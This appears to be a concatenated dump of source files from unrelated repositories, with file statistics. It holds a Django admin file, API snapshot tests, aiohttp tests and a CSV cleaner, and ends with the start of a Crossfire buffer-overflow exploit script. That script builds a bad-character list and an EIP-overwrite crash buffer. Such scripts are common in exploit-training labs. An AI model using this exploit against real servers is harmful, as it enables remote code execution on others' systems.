admin.site.register(HuellaDigital)

# 01_PREWORK/week02/pra/your-code/carlos_cabruja.py (ivanof11/The_Bridge_DataScience_PT_ALUMNI_feb22, MIT)
print("Hello The Bridge!")

# gtfs/tests/snapshots/snap_test_routes_api.py (montel-ig/maritime-maas, MIT)
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals

from snapshottest import Snapshot

snapshots = Snapshot()

snapshots["test_rider_categories_with_prices 1"] = [
    {
        "customer_types": [
            {
                "currency_type": "EUR",
                "description": "description of test rider category",
                "id": "00000000-0000-0000-0000-000000000001",
                "name": "name of test rider category",
                "price": "1.00",
            },
            {
                "currency_type": "EUR",
                "description": "description of test rider category",
                "id": "00000000-0000-0000-0000-000000000002",
                "name": "name of test rider category",
                "price": "2.00",
            },
            {
                "currency_type": "EUR",
                "description": "description of test rider category",
                "id": "00000000-0000-0000-0000-000000000003",
                "name": "name of test rider category",
                "price": "3.00",
            },
        ],
        "description": "Description",
        "id": "00000000-0000-0000-0000-000000000000",
        "instructions": "Instructions",
        "name": "Name",
    }
]

snapshots["test_routes 1"] = [
    {
        "agency": {
            "email": "test-agency@example.com",
            "logo_url": "www.testagency.com/logo",
            "name": "test agency",
            "phone": "777777",
            "url": "www.testagency.com",
        },
        "capacity_sales": 0,
        "description": "desc of test route ",
        "id": "00000000-0000-0000-0000-000000000000",
        "name": "",
        "stops": [
            {
                "description": "desc of test stop ",
                "id": "00000000-0000-0000-0000-000000000001",
                "name": "stop ",
                "tts_name": "tts_name of stop ",
                "wheelchair_boarding": 0,
            },
            {
                "description": "desc of test stop ",
                "id": "00000000-0000-0000-0000-000000000002",
                "name": "stop ",
                "tts_name": "tts_name of stop ",
                "wheelchair_boarding": 0,
            },
        ],
        "ticket_types": [],
        "url": "url of test route ",
    }
]

snapshots["test_routes_departures[filters2] 1"] = [
    {
        "arrival_time": "2021-02-18T13:00:00Z",
        "bikes_allowed": 0,
        "block_id": "block_id of test trip 1",
        "departure_headsign": "headsign of test trip ",
        "departure_time": "2021-02-18T13:00:00Z",
        "direction_id": 0,
        "id": "00000000-0000-0000-0000-000000000003",
        "short_name": "short_name of test trip ",
        "stop_headsign": "stop_headsign of test stop time ",
        "stop_sequence": 1,
        "stops_after_this": 1,
        "timepoint": 1,
        "wheelchair_accessible": 0,
    },
    {
        "arrival_time": "2021-02-19T01:00:00Z",
        "bikes_allowed": 0,
        "block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T01:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
snapshots["test_routes_departures[filters2] 2"] = [
{
"arrival_time": "2021-02-18T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T00:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T00:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
snapshots["test_routes_departures[filters3] 1"] = [
{
"arrival_time": "2021-02-19T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000005",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters3] 2"] = [
{
"arrival_time": "2021-02-19T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000005",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters4] 1"] = [
{
"arrival_time": "2021-02-18T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters4] 2"] = [
{
"arrival_time": "2021-02-18T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters5] 1"] = [
{
"arrival_time": "2021-02-19T01:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T01:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters5] 2"] = [
{
"arrival_time": "2021-02-19T00:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T00:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters6] 1"] = []
snapshots["test_routes_departures[filters6] 2"] = []
snapshots["test_routes_departures[filters7] 1"] = [
{
"arrival_time": "2021-02-18T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T01:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T01:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
snapshots["test_routes_departures[filters7] 2"] = [
{
"arrival_time": "2021-02-18T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T00:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T00:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
| 33.805031 | 68 | 0.557302 | 1,215 | 10,750 | 4.719342 | 0.080658 | 0.069062 | 0.073247 | 0.065923 | 0.928845 | 0.898326 | 0.877398 | 0.852285 | 0.852285 | 0.852285 | 0 | 0.159688 | 0.295721 | 10,750 | 317 | 69 | 33.911672 | 0.597675 | 0.005767 | 0 | 0.682274 | 0 | 0 | 0.579036 | 0.1416 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006689 | 0 | 0.006689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
63406ddaa3303982053eb00f09c38919c00d2f1a | 148 | py | Python | profesores/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | profesores/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | profesores/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | from .models import *
from django.contrib import admin
class ProfesorAdmin(admin.ModelAdmin):
pass
admin.site.register(Profesor, ProfesorAdmin)
| 18.5 | 43 | 0.804054 | 18 | 148 | 6.611111 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121622 | 148 | 7 | 44 | 21.142857 | 0.915385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
63590e5b1089d8cd7cfda5467ef2962a2c5442fd | 37 | py | Python | accuasset/domain/__init__.py | sooeun67/accuasset | 0db5b0c189784f48033f7c7b3e7d130b43d9fb79 | [
"MIT"
] | null | null | null | accuasset/domain/__init__.py | sooeun67/accuasset | 0db5b0c189784f48033f7c7b3e7d130b43d9fb79 | [
"MIT"
] | null | null | null | accuasset/domain/__init__.py | sooeun67/accuasset | 0db5b0c189784f48033f7c7b3e7d130b43d9fb79 | [
"MIT"
] | 2 | 2021-03-25T02:06:50.000Z | 2021-03-25T02:52:10.000Z | from .nlp import *
from .eda import * | 18.5 | 18 | 0.702703 | 6 | 37 | 4.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 37 | 2 | 19 | 18.5 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
636abb9d2ffdab32f4fed0022edb6d88aaed73e3 | 14 | py | Python | project_files/a.py | yangpan0152/Alita | 87f3bea03684a3333e3d86d3237834fdbcf9d908 | [
"MIT"
] | null | null | null | project_files/a.py | yangpan0152/Alita | 87f3bea03684a3333e3d86d3237834fdbcf9d908 | [
"MIT"
] | null | null | null | project_files/a.py | yangpan0152/Alita | 87f3bea03684a3333e3d86d3237834fdbcf9d908 | [
"MIT"
] | null | null | null | a = 10
b = 30
| 4.666667 | 6 | 0.428571 | 4 | 14 | 1.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.428571 | 14 | 2 | 7 | 7 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
639fe7ff57af936b0c175ca5d23a510fb5eccb7a | 176 | py | Python | modules/dials/model/data/__init__.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/model/data/__init__.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/model/data/__init__.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T15:39:06.000Z | 2020-02-04T15:39:06.000Z | from __future__ import absolute_import, division, print_function
import boost.python
ext = boost.python.import_ext("dials_model_data_ext")
from dials_model_data_ext import *
| 25.142857 | 64 | 0.840909 | 26 | 176 | 5.192308 | 0.5 | 0.162963 | 0.207407 | 0.251852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096591 | 176 | 6 | 65 | 29.333333 | 0.849057 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8925bd396ab3503bd9f1ecc2291873b51f786545 | 33 | py | Python | basic_ml/__init__.py | dagster-io/dagster-ml-example | c80fbcc49a2be0f32e46b7c4824ff909a92bba83 | [
"Apache-2.0"
] | null | null | null | basic_ml/__init__.py | dagster-io/dagster-ml-example | c80fbcc49a2be0f32e46b7c4824ff909a92bba83 | [
"Apache-2.0"
] | 3 | 2022-02-03T15:27:50.000Z | 2022-02-03T16:49:01.000Z | basic_ml/__init__.py | dagster-io/dagster-ml-example | c80fbcc49a2be0f32e46b7c4824ff909a92bba83 | [
"Apache-2.0"
] | null | null | null | from .repository import basic_ml
| 16.5 | 32 | 0.848485 | 5 | 33 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
89372fac77f04b54a86f8fd9650f2574230f8066 | 3,259 | py | Python | tests/test_web_app.py | Pentusha/aiohttp-apispec | a531a164f719f9d0077a6a3cd6730c3d6de6926c | [
"MIT"
] | null | null | null | tests/test_web_app.py | Pentusha/aiohttp-apispec | a531a164f719f9d0077a6a3cd6730c3d6de6926c | [
"MIT"
] | null | null | null | tests/test_web_app.py | Pentusha/aiohttp-apispec | a531a164f719f9d0077a6a3cd6730c3d6de6926c | [
"MIT"
] | null | null | null |
async def test_response_200_get(aiohttp_app):
res = await aiohttp_app.get('/v1/test', params={'id': 1, 'name': 'max'})
assert res.status == 200
async def test_response_422_get(aiohttp_app):
res = await aiohttp_app.get(
'/v1/test', params={'id': 'string', 'name': 'max'}
)
assert res.status == 422
async def test_response_200_post(aiohttp_app):
res = await aiohttp_app.post('/v1/test', json={'id': 1, 'name': 'max'})
assert res.status == 200
async def test_response_200_post_callable_schema(aiohttp_app):
res = await aiohttp_app.post(
'/v1/test_call', json={'id': 1, 'name': 'max'}
)
assert res.status == 200
async def test_response_422_post(aiohttp_app):
res = await aiohttp_app.post(
'/v1/test', json={'id': 'string', 'name': 'max'}
)
assert res.status == 422
async def test_response_not_docked(aiohttp_app):
res = await aiohttp_app.get('/v1/other', params={'id': 1, 'name': 'max'})
assert res.status == 200
async def test_response_data_post(aiohttp_app):
res = await aiohttp_app.post(
'/v1/echo', json={'id': 1, 'name': 'max', 'list_field': [1, 2, 3, 4]}
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'list_field': [1, 2, 3, 4],
}
async def test_response_data_get_old_data(aiohttp_app):
res = await aiohttp_app.get(
'/v1/echo_old',
params=[
('id', '1'),
('name', 'max'),
('bool_field', '0'),
('list_field', '1'),
('list_field', '2'),
('list_field', '3'),
('list_field', '4'),
],
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'bool_field': False,
'list_field': [1, 2, 3, 4],
}
async def test_response_data_get(aiohttp_app):
res = await aiohttp_app.get(
'/v1/echo',
params=[
('id', '1'),
('name', 'max'),
('bool_field', '0'),
('list_field', '1'),
('list_field', '2'),
('list_field', '3'),
('list_field', '4'),
],
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'bool_field': False,
'list_field': [1, 2, 3, 4],
}
async def test_response_data_class_get(aiohttp_app):
res = await aiohttp_app.get(
'/v1/class_echo',
params=[
('id', '1'),
('name', 'max'),
('bool_field', '0'),
('list_field', '1'),
('list_field', '2'),
('list_field', '3'),
('list_field', '4'),
],
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'bool_field': False,
'list_field': [1, 2, 3, 4],
}
async def test_response_data_class_post(aiohttp_app):
res = await aiohttp_app.post('/v1/class_echo')
assert res.status == 405
async def test_response_data_class_without_spec(aiohttp_app):
res = await aiohttp_app.delete('/v1/class_echo')
assert (await res.json()) == {'hello': 'world'}
async def test_swagger_handler_200(aiohttp_app):
res = await aiohttp_app.get('/v1/api/docs/api-docs')
assert res.status == 200
| 26.072 | 77 | 0.529303 | 415 | 3,259 | 3.913253 | 0.120482 | 0.160099 | 0.096059 | 0.144089 | 0.879926 | 0.8633 | 0.822044 | 0.822044 | 0.781404 | 0.637315 | 0 | 0.043966 | 0.288125 | 3,259 | 124 | 78 | 26.282258 | 0.656034 | 0 | 0 | 0.606061 | 0 | 0 | 0.166053 | 0.006446 | 0 | 0 | 0 | 0 | 0.131313 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89379c1124eb373ef294e1bc26dc6c55cc821810 | 3,443 | py | Python | Uploads/format.py | sudhamstarun/DataSorcerer | b61532204b1d8a0e354833abe7a661f1bb1b4d27 | [
"MIT"
] | 4 | 2019-09-14T16:32:46.000Z | 2021-10-11T06:01:38.000Z | Uploads/format.py | sudhamstarun/DataSorcerer | b61532204b1d8a0e354833abe7a661f1bb1b4d27 | [
"MIT"
] | 2 | 2019-04-12T13:17:19.000Z | 2019-04-25T11:46:50.000Z | Uploads/format.py | sudhamstarun/DataSorcerer | b61532204b1d8a0e354833abe7a661f1bb1b4d27 | [
"MIT"
] | 7 | 2019-09-04T22:04:11.000Z | 2021-11-11T13:58:30.000Z | import csv
import sys
in_file = sys.argv[1]
out_file = sys.argv[2]
row_reader = csv.reader(open(in_file, "rt", encoding="utf-8"))
row_writer = csv.writer(open(out_file, "wt", encoding="utf-8"))
for row in row_reader:
i = 0
new_row = []
for val in row:
if not val or val == '\xa0' or val == '$' or val == ')%' or val == ')' or val == '\xa0\xa0' or val == '\n\xa0\n' or val == '\xa0\n' or val == '\n\xa0' or val == '\n$' or val == '\n) $' or val == '\n)' or val == '\n)%' or val == ')\xa0' or val == 'USD' or val == '\n 0\n' or val == '\n $\n' or val == '\n )\n' or val == '\n %\n' or val == '\n\xa0\t' or val == '\n\n' or val == '\xa0\n\t' or val == '%' or val == ' ' or val == '\nUSD\n' or val == '1' or val == '2' or val == '3' or val == '4' or val == '5' or val == '6' or val == '7' or val == '8' or val == '\nUSD\n' or val == '\xa0USD' or val == '\n\xa0USD\n' or val == '\n$\n' or val == '\n)\n' or val == '\n%' or val == '\nUSD ' or val == '\n$' or val == '\xa0\xa0\xa0\xa0\xa0\xa0$' or val == '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0$' or val == '\xa0$' or val == ' \xa0' or val == '\nUSD ' or val == '\n%' or val == '\nJPY ' or val == '\n ' or val == '\xa0 ' or val == '$\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 ' or val == '\xa0 ' or val == '\nRUB ' or val == '\nCHF ' or val == '\nCOP ' or val == '\nMXN ' or val == '\nUSD ' or val == '%\xa0' or val == '\nJPY' or val == '\nGBP' or val == '\nCHF' or val == '\nUSD' or val == '\n%+' or val == '\xa0\n ' or val == '\n%)' or val == '\xa0\xa0\xa0' or val == '\xa0\xa0\xa0\xa0' or val == '$ ' or val == '\xa0\xa0\xa0\n' or val == ')%\xa0' or val == '\n ' or val == 'Currency' or val == '\n' or val == '\xa0\n\n\t' or val == '%)' or val == '(13)' or val == '(11)' or val == '($' or val == '\n\xa0\n \n' or val == '\n%\n' or val == '\n)\xa0\xa0\n' or val == 'USD\xa0' or val == ') $' or val == '\xa0\xa0\xa0\xa0\xa0' or val == '\xa0\xa0\xa0\xa0\xa0\xa0\xa0' or val == '\n\xa0 ' or val == '\n) ' or val == '\n$ ' or val == '\n% ' or val == '\n\n\xa0 ' or val == '\n\nUSD ' or val == ' \n\xa0\n\n' or val == '\n\n \xa0\n' or val == '\n\n\nUSD\n\n' or val == '\n\n\n \xa0\n\n' or val == '\n)%\n' or val == '\xa0\xa0\xa0\xa0\xa0\xa0' or val == '\n\n\t\t\t\t\t\t\xa0\n' or val == ' 
\n\n\t\t\t\t\t\t\t)\n\n' or val == ' \n$\n\n' or val == '\n\n\t\t\t\t\t\t)\n' or val == '\n\n\t\t\t\t\t\t$\n' or val == ' \n\n' or val == '\xa0\xa0 ' or val == 'USD ' or val == ')\xa0 ' or val == '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\n' or val == ' \n\n\t\t\t\t\t\t\t\xa0\n\n' or val == ' \n\n\t\t\t\t\t\t\t$\n\n' or val == ' \n%\n\n' or val == ' \n)\n\n' or val == '\n \n' or val == '\xa0\n\n ' or val == '\n \xa0' or val == '\n \xa0' or val == '\n\xa0\n)\n' or val == 'USD \xa0' or val == '(@ ' or val == '\n ' or val == '\nUSD ' or val == '\n \xa0 \xa0' or val == '\n \xa0' or val == '\n\xa0\n ' or val == '\n\xa0 ' or val == '\n\xa0 ' or val == '\n\xa0\n ' or val == '\n\xa0\n\t' or val == '%)\xa0':
# new_row.append(row[i+1])
if(i+1 != (len(row)-1)):
i += 1
else:
new_row.append(val)
if(i+1 != len(row)):
i += 1
#print (row, "->", new_row )
if(len(new_row) > 3):
row_writer.writerow(new_row)
| 137.72 | 2,878 | 0.451351 | 661 | 3,443 | 2.329803 | 0.077156 | 0.412338 | 0.22987 | 0.296104 | 0.756494 | 0.684416 | 0.6 | 0.584416 | 0.517532 | 0.420779 | 0 | 0.0556 | 0.268661 | 3,443 | 24 | 2,879 | 143.458333 | 0.555997 | 0.014813 | 0 | 0.105263 | 0 | 0.263158 | 0.360578 | 0.091767 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89a38cd5fe48a6f21eb422b866c8ffcbd0d03e2f | 117 | py | Python | src/pyfbad/__init__.py | Teknasyon-Teknoloji/pyfbad | e26c95528f50ae18f9276df95a9037ea7254d376 | [
"MIT"
] | 27 | 2022-01-14T12:04:11.000Z | 2022-03-18T07:41:48.000Z | src/pyfbad/__init__.py | Teknasyon-Teknoloji/pyfbad | e26c95528f50ae18f9276df95a9037ea7254d376 | [
"MIT"
] | null | null | null | src/pyfbad/__init__.py | Teknasyon-Teknoloji/pyfbad | e26c95528f50ae18f9276df95a9037ea7254d376 | [
"MIT"
] | 4 | 2022-01-17T06:04:19.000Z | 2022-03-23T18:16:31.000Z | from . import data
from . import models
from . import features
from . import visualization
from . import notification | 23.4 | 27 | 0.794872 | 15 | 117 | 6.2 | 0.466667 | 0.537634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162393 | 117 | 5 | 28 | 23.4 | 0.94898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98a5a626e81d732939df30f5fd6c74352f15528a | 1,677 | py | Python | application/scripts/crossfire/cf-badchar-eip3.py | cys3c/viper-shell | e05a07362b7d1e6d73c302a24d2506846e43502c | [
"PSF-2.0",
"BSD-2-Clause"
] | 2 | 2018-06-30T03:21:30.000Z | 2020-03-22T02:31:02.000Z | application/scripts/crossfire/cf-badchar-eip3.py | cys3c/viper-shell | e05a07362b7d1e6d73c302a24d2506846e43502c | [
"PSF-2.0",
"BSD-2-Clause"
] | null | null | null | application/scripts/crossfire/cf-badchar-eip3.py | cys3c/viper-shell | e05a07362b7d1e6d73c302a24d2506846e43502c | [
"PSF-2.0",
"BSD-2-Clause"
] | 3 | 2017-11-15T11:08:20.000Z | 2020-03-22T02:31:03.000Z | #!/usr/bin/python
import socket
#nasm > add eax,12
#00000000 83C00C add eax,byte +0xc
#nasm > jmp eax
#00000000 FFE0 jmp eax
#Fortunately for us, these two sets of instructions take up only 5 bytes of memory
#convert 83C00C and FFE0 to hex below
#\x83\xc0\x0c\xff\xe0
host = "127.0.0.1"
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
crash="\x41" * 4368 + "B" * 4 + badchars + "C" * 7
buffer = "\x11(setup sound " + crash
